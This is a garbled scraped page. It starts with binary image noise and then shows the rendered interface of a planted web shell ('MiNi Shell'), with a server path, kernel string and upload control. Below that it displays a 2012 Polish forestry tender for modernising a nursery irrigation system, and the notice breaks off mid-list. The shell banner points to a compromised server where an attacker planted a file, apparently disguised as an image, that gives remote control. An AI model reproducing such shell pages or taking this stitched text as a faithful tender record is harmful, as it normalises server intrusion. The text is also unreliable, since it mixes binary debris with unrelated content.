JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20120509/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20120509/102013-N-2012.html

<p class="kh_header"><b>Pniewy: Modernizacja systemu nawadniania szkółki Leśnej Dąbrowa 
w Nadleśnictwie Pniewy</b><br>
<b>Numer ogłoszenia: 102013 - 2012; data zamieszczenia: 09.05.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Państwowe Gospodarstwo Leśne Lasy Państwowe - Nadleśnictwo Pniewy , ul. Wolności 4, 62-045 Pniewy, woj. wielkopolskie, tel. 061 2936420, faks 061 2936435.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> http://pniewy.poznan.lasy.gov.pl/index.html</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: Państwowa jednostka organizacyjna nieposiadająca osobowości prawnej PGL LP.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Modernizacja systemu nawadniania szkółki Leśnej Dąbrowa 
w Nadleśnictwie Pniewy.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Zadanie ma na celu modernizację istniejącego systemu deszczującego. 
W ramach projektu proponuje się wykonanie następujących zmian w istniejącej instalacji  deszczującej:
węzeł hydroforowy o wydatku do 60 m3/h;
system automatycznego sterowania nawodnieniem z możliwością ochrony przeciw przymrozkowej;
uzbrojenie studni głębinowej w pompę głębinową;
ogrodzenie zbiornika wyrównawczego, pompowni, studni głębinowej
Przewidywane prace nie będą miały zasadniczego wpływu na istniejącą infrastrukturę szkółki leśnej. Prace wykonywane są w ramach zgłoszenia zamiaru wykonywania robót budowlanych. Wszystkie prace objęte projektem nie wykraczają poza obręb szkółki i zakres oddziaływania istniejącej deszczowni przenośnej. Projektowane prace nie zmienią dotychczasowego układu komunikacyjnego jak i granic działek produkcyjnych 

Podziemna sieć nitek deszczujących
Dla deszczowni stałej na szkółce leśnej przewiduje się wykonanie nitek deszczujących z rur PE 75 PN80 w wykopach głębokości 50 cm i szerokości 30 cm, wykop wykonywany koparką łańcuchową np. CAS 460 w pasie szerokości 1,5 m z zasypaniem. Nitki deszczujące z wyjściami hydrantowymi zraszaczy rys. nr 5 uzbrojone w zraszacze pełnoobrotowe lub sektorowe w zależności od lokalizacji hydrantu na skraju  kwatery - sektor, w środku  kwatery pełnoobrotowe inaczej nitki studzienek typ E-2 sektor, typ E-1 pełno obrotowy, oraz odwadniakami na poszczególnych nitkach kwater rys. nr 4 zlokalizowanych wg planu sytuacyjnego. Główne rurociągi istniejące PCV są odwadniane niezależnie przez istniejące studzienki oznakowane na planie sytuacyjnym jako 0-1 Uzbrojenie nitek zraszających w węzły hydrantowe z elektrozaworami PGE rys. nr 2 TYP E-1 i rys. nr 3 TYP E-2 są zaprojektowane na bazie istniejących studzienek z kręgów betonowych o średnicy 50 cm z istniejącymi podłączeniami do rurociągów poprzez 2- króciec kołnierzowy. 

Pompownia  deszczowni
Istniejący budynek pompowni będzie miejscem zamontowania nowego zestawu pompowego  po uprzednim zdemontowaniu pompy IRYS - 600 i rurociągu ssawnego, tłocznego do studni rewizyjnej zewnętrznej tj. do kolana żeliwnego 2-kołnierzowego na wejściu rurociągu tłocznego do studni. Budynek posiada zasilanie energetyczne z rozdzielnią RP zasilającą pompę IRYS o mocy 21 kW dlatego to opracowanie nie obejmuje części elektrycznej ponieważ nowy zestaw zostanie zasilany energią z modernizowanej rozdzielni i przeniesionej na ścianie przy wejściu do budynku, uwzględniono koszt przeniesienia i modernizacji w części kosztorysowej.
Modernizacji wymaga posadzka betonowa pompowni poprzez skucie fundamentu pompy IRYS, pomalowanie ścian i ułożenie płytek glazury na ścianach do wysokości 1,5 m, ułożenie płytek glazury na posadzce pompowni, ocieplenie drzwi stalowych 135 x 210, malowanie elewacji zewnętrznej.
Dane charakterystyczne budynku pompowni:
- powierzchnia użytkowa    11,56 m2
- powierzchnia zabudowy   16,0 m2
- wysokość kondygnacji     2,30 m
- wymiary wewnętrzne budynku   3,40 x 3,40 m
- instalacja elektryczna
- wentylacja grawitacyjna
- kratka odpływowa w posadzce

Ujęcie  wody  i  zestaw  pomp
Modernizacja węzła pompowego wiąże się z montażem następujących elementów:
A.	Zestaw pompowy HYDRO - MPC, CRE 32 - 4 + AP 12.40.06 z układem zalewającym o napędzie elektrycznym, w skład którego wchodzą: 
dwie pompy podstawowe typ CRE 32.4/7,5 kW
pompa zalewająca typ AP 12,40.06/0,94 kW
kolektor ssawny i tłoczny ze stali ocynowanej ogniowo
konstrukcja wsporcza  zestawu ze stali ocynkowanej wsparta na wibroizolatorach
szafa sterownicza zawierająca kompletny osprzęt elektryczny i układ sterująco-zabezpieczający
zabezpieczenie pracy zestawu przed sucho biegiem
armatura odcinająco-zwrotna dla każdej pompy
membranowy zbiornik ciśnieniowy
manometry kontrolne oraz przetwornik ciśnienia
przetwornica częstotliwości współpracująca ze sterownikiem mikroprocesorowym
sterownik z panelem umożliwiającym obserwacje parametrów pracy zestawu
zabezpieczenie pracy: zwarciowe, termiczne, przed sucho biegiem, pracą dwufazową i asymetrią napięcia.
ręczny pilot obsługowo - diagnostyczny  R-100

Agregat ten może pracować w zakresie wydatku od 10 do 60 m3/h przy podnoszeniu do 65 m słupa wody. Jedna pompa CRE 32.4 sterowana jest przetwornicą częstotliwości, druga CR 32.4 sterowana kaskadowo mikroprocesorem. Pompy w układzie pracują równolegle do zadanego ciśnienia. Jeśli przy obrotach maksymalnych pierwsza pompa nie może osiągnąć zadanego ciśnienia zostaje załączona druga pompa. Zmiana funkcji pomp w zależności od obciążenia, czasu i zakłóceń następuje automatycznie.
Parametry techniczne zestawu pompowego
wydajność przy wysokości podnoszenia      H-6,5 bar  Q-60,0,m3/h
moc elektryczna                                            2 x 7,5 + 0,94 = 15,94 kW
napięcie zasilania                                          U = 3 x 400 V
średnica przyłącza ssawnego i tłocznego     Dn= 110 mm
B.	Zespół filtrów żwirowo-piaskowych składający się z dwóch połączonych baniek stalowych YAMIT F 650 z wkładem żwirowym, połączonych w jeden układ filtrujący. Zespół ten służyć będzie do usuwania zanieczyszczeń mechanicznych i biologicznych zawartych w wodzie, przy czym rodzaj stosowanego złoża dostosowany winien być do rodzaju i wielkości cząstek zanieczyszczeń. Filtry YAMIT zostały zaprojektowane i wyprodukowane według najwyższych standardów jakościowych. Czyszczenie filtrów odbywa się poprzez automatyczne płukanie złoża odwróconym obiegiem wody. 
Parametry techniczne zestawu filtrów 2 x YAMIT F-650: 
zalecany przepływ do 100 m3/s 
średnica zbiornika 36 
średnica przyłączy 6 
wysokość całkowita 1 110 mm 
pojemność 2 x1,15 m3 
ciężar wkładu 2 x 480 kg 
Wodomierz skrzydełkowy irygacyjny typu WI do pomiaru ilości wody pobieranej do nawodnień.
C.	Zawór startowy BERMAD 400 RAM 6-1003W zawór powoduje że system głównych rurociągów rozprowadzających pozostaje pod ciśnieniem tylko podczas realizacji programu nawodnień zawór startowy otwarty. W pozostałym czasie zawór odcina dopływ wody do systemu zawór  startowy zamknięty. Zawór startowy posiada także przełącznik ręczny.
D.	Zawór zwrotny zamontowany na końcu układu tłocznego pompowni, zabezpieczać będzie wszystkie urządzenia węzła hydroforowego przed uderzeniem hydraulicznym.
E.	Inżektor typu AMIAD o hydraulicznym mechanizmie napędzającym wykorzystującym ciśnienie i przepływ w rurociągu tłocznym.
F.	Uzbrojenie studni głębinowej w pompę głębinowa typ. SQ 5.15 z sterowaniem ecluwo 111 LP i zabezpieczeniami elektrycznymi SPT-2. Sondy ecluwo SW-01 zamontowane w studni ujęciowej zestawu pompowego Hydro
Sterowanie  automatyczne  procesu  deszczowania
Na szkółce leśnej Dąbrowa Nadleśnictwa Pniewy deszczowaniem ochronnym/przeciw przymrozkom w oparciu o zaprojektowane urządzenia tj. stacja meteo, komputer, zraszacz Naan 233 B AF z dyszą 3,5 mm i Q-0,93 m3/h system zabezpiecza prace jednocześnie 65 zraszaczy na powierzchni około 1,5 do 2,0 ha. Wynika to z warunków optymalnej intensywności  deszczowania ochronnego w warunkach bezwietrznej, lub przy minimalnym ruchu powietrza, wynosi 5 mm/h, a wydatek modernizowanej pompowni to ~ 60m3/h.

Urządzenia sieci szczegółowej na nawadnianych kwaterach
Stałe nitki deszczujące zaprojektowane na kwaterach od 1 do11 
-	 rurociągi PE PN80 - śred.75 długości całkowitej 4977,0 mb
-	rurociągi nitek zaprojektowano na głębokości 50 cm
-	 na nitkach przewidziano odwadniaki z ręcznymi zaworami ?
-	wyjścia hydrantowe oc. ? L-1,0m pod zraszacz z rurą osłonową PCV
-	węzły studzienek elektro zaworu typ E-1 i E-2 zaprojektowane na bazie istniejących studzienek dla deszczowni półstałej.
-	siatka mierników wilgotności podłoża WATERMARK 

Sterowanie  nawodnieniem.
Proces nawadniania na wszystkich kwaterach prowadzony będzie automatycznie poprzez system, w skład którego wchodzą:
komputer nawodnieniowy AQUA CX-300
stacja meteo z pomiarem temperatury, siły wiatru, deszczomierz 
elektrozawory okablowanie pomiarowe isterujące
Zaproponowany komputer nawodnieniowy AQUA CX-300 jest to urządzenie specjalnie zaprojektowane do zautomatyzowania procesu nawadniania. Posiada wygodną w obsłudze klawiaturę, ośmioliniowy wyświetlacz. 
Konfiguracja komputera:
-	możliwość obsługi do 40 elektrozaworów
-	równoległy sygnał na zawór startowy
-	trzy programy nawadniania w trzech grupach
-	start zegarowy, start czujnikowy, start manualny
-	jedno dodatkowe wyjście sygnałów dla każdego programu
-	równoczesne otwarcie dla czterech zaworów
-	możliwość cyklicznego powtarzania programów
-	rozbudowa o moduł meteo pomiar warunków pogodowych opad, temperatura 
Elektrozawory i okablowanie
- zawór startowy, zawory sekcyjne kwater posiadają cewki 2 i 3 W, sterowanie sygnałem prądowym 24 VAC, transformator znajduje się w skrzyni komputera
Zamawiający zastrzega, że nazwy własne materiałów, urządzeń itp. użytych w opisie przedmiotu zamówienia nie są wiążące, Wykonawca może zaproponować inne równoważne o nie gorszych parametrach technicznych od opisanych w postępowaniu..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>Zamawiający, przewiduje możliwość udzielania zamówień uzupełniających, o których mowa w art. 67 ust. 1 pkt 6 PZP, w wysokości nie przekraczającej 50% wartości zamówienia podstawowego.
Zamawiający z ważnych przyczyn jest uprawniony ograniczyć przedmiot umowy w stosunku do zakresu określonego w specyfikacji istotnych warunków zamówienia. Ograniczenie przedmiotu umowy w stosunku do zakresu  określonego w specyfikacji istotnych warunków zamówienia nie stanowi niewykonania lub nienależytego wykonania zobowiązania a w związku z tym nie jest podstawą do ponoszenia jakichkolwiek roszczeń wobec zamawiającego.</li></ul>
<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 45.23.00.00-8, 45.23.10.00-5, 45.23.13.00-8, 45.23.21.00-3, 45.23.21.20-9, 45.30.00.00-0, 45.31.00.00-3, 45.34.00.00-2.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.08.2012.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> 1.	Każda oferta musi być zabezpieczona wadium (zgodnie z art. 45 ust.4) o wartości: 3.000,00 zł. (słownie złotych: trzy tysiące złotych 00/100).
2.	Wadium może być wnoszone wedle wyboru Wykonawcy w jednej lub kilku następujących formach:
1)	pieniądzu
2)	poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo - kredytowej, z tym że poręczenie kasy jest zawsze poręczeniem pieniężnym,
3)	gwarancjach bankowych
4)	gwarancjach ubezpieczeniowych;
5)	poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (tekst jedn. Dz. U. z 2007 r. Nr 42, poz. 275, z późn. zm.).
3.	Wadium wnoszone w pieniądzu należy wpłacić przelewem na rachunek bankowy Zamawiającego: PKO BP O/Szamotuły 65 1020 4128 0000 1402 0035 0538 . Wadium w formie gotówki nie będzie przyjmowane. Wadia wnoszone w innych formach niż pieniądz należy załączyć do oferty.
4.	Wadium w pieniądzu należy wnieść w terminie do dnia 05.04.2012 do godz. 09:00. Za moment wniesienia wadium uznaje się moment uznania rachunku Zamawiającego. 
5.	W przypadku wniesienia wadium w innej formie niż pieniądz, termin ważności wystawionego dokumentu powinien być zgodny z terminem związania ofertą.
6.	W przypadku wniesienia wadium w formie gwarancji/poręczenia, gwarancja/poręczenie powinna być sporządzona zgodnie z obowiązującym prawem i winna zawierać następujące elementy:
1)	nazwę dającego zlecenie (Wykonawcy), beneficjenta gwarancji/poręczenia (Zamawiającego), gwaranta (banku lub instytucji ubezpieczeniowej udzielających gwarancji/poręczenia) oraz wskazanie ich siedzib,
2)	określenie wierzytelności, która ma być zabezpieczona gwarancją/poręczeniem,
3)	kwotę gwarancji/poręczenia,
4)	zobowiązanie gwaranta/poręczyciela do zapłacenia kwoty gwarancji/poręczenia na pierwsze pisemne żądanie Zamawiającego w okolicznościach określonych w art. 46 ust. 4a PZP oraz art. 46 ust. 5 PZP. 
7.	Zamawiający zwróci wadium wszystkim Wykonawcom niezwłocznie po wyborze oferty najkorzystniejszej lub unieważnieniu postępowania, z wyjątkiem Wykonawcy, którego oferta została wybrana jako najkorzystniejsza, z zastrzeżeniem art. 46 ust.4a PZP
8.	Wykonawcy, którego oferta została wybrana jako najkorzystniejsza, Zamawiający zwraca wadium niezwłocznie po zawarciu umowy w sprawie zamówienia publicznego. 
9.	Zamawiający zwraca niezwłocznie wadium, na wniosek Wykonawcy, który wycofał ofertę przed upływem terminu składania ofert.
10.	Zamawiający żąda ponownego wniesienia wadium przez Wykonawcę, któremu zwrócono wadium na podstawie art.46 ust.1 PZP, jeżeli w wyniku ostatecznego rozstrzygnięcia odwołania jego oferta została wybrana jako najkorzystniejsza. Wykonawca wnosi wadium w terminie określonym przez Zamawiającego.
11.	Jeżeli wadium wniesiono w pieniądzu, Zamawiający zwraca je wraz z odsetkami wynikającymi z umowy rachunku bankowego, na którym było ono przechowywane, pomniejszone o koszty prowadzenia rachunku bankowego oraz prowizji bankowej za przelew pieniędzy na rachunek bankowy wskazany przez wykonawcę.
12.	Zamawiający zatrzyma wadium wraz z odsetkami, jeżeli wykonawca, którego oferta została wybrana:
1)	odmówi podpisania umowy w sprawie zamówienia publicznego na warunkach określonych w ofercie;
2)	zawarcie umowy w sprawie zamówienia publicznego stało się niemożliwe z przyczyn leżących po stronie wykonawcy. 
13.	Zamawiający zatrzymuje wadium wraz z odsetkami, jeżeli w odpowiedzi na wezwanie, o którym mowa w art. 26 ust. 3 PZP, wykonawca nie złożył dokumentów lub oświadczeń, o których mowa w art. 25 ust. 1 PZP lub pełnomocnictw, chyba że udowodni, że wynika to z przyczyn nie leżących po jego stronie.</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca złoży oświadczenie o spełnieniu warunków udziału w postępowaniu określonych w art. 22 ust. 1 PZP - wg wzoru - załącznik nr 2 do niniejszej specyfikacji istotnych warunków zamówienia,</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca wykaże wykonaniem w okresie ostatnich 5 lat (a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie) przed upływem terminu składania ofert przynajmniej jednej (1) roboty budowlanej w zakresie robót budowlanych z  budownictwa systemów nawadniania, deszczowania itp. (nawadniania szkółek, szklarni, konspektów itp.) o wartości brutto co najmniej 300.000,00 zł brutto, dla jednego zadania z podaniem ich rodzaju i wartości, daty i miejsca wykonania z załączeniem dokumentów potwierdzających, że roboty te zostały wykonane  zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca wykaże, że dysponuje następującymi narzędziami i urządzeniami niezbędnymi do wykonania zamówienia:
-mikrokoparka, lub koparka łańcuchowa do rowów  - 1 sztuka 
-środek transportowy do 0,9 tony - 1 sztuka</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca wykaże, że dysponuje co najmniej 1 osobą posiadającą uprawnienia w zakresie kierowania robotami budowlanymi w specjalności instalacyjno-inżynieryjnej w zakresie instalacji sanitarnych (kierownik budowy).</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca wykaże, że posiada ubezpieczenie od odpowiedzialności cywilnej w zakresie prowadzonej działalności na sumę ubezpieczenia nie mniejszą niż 300 000,00 zł.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych w zakresie niezbędnym do wykazania spełniania warunku  wiedzy i doświadczenia, wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz załączeniem dokumentu potwierdzającego, że roboty zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone</li>

<li  style="margin-bottom: 12px;">wykaz narządzi, wyposażenia zakładu i urządzeń technicznych dostępnych wykonawcy usług lub robót budowlanych w celu realizacji zamówienia wraz z informacją o podstawie  dysponowania tymi zasobami</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 9 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
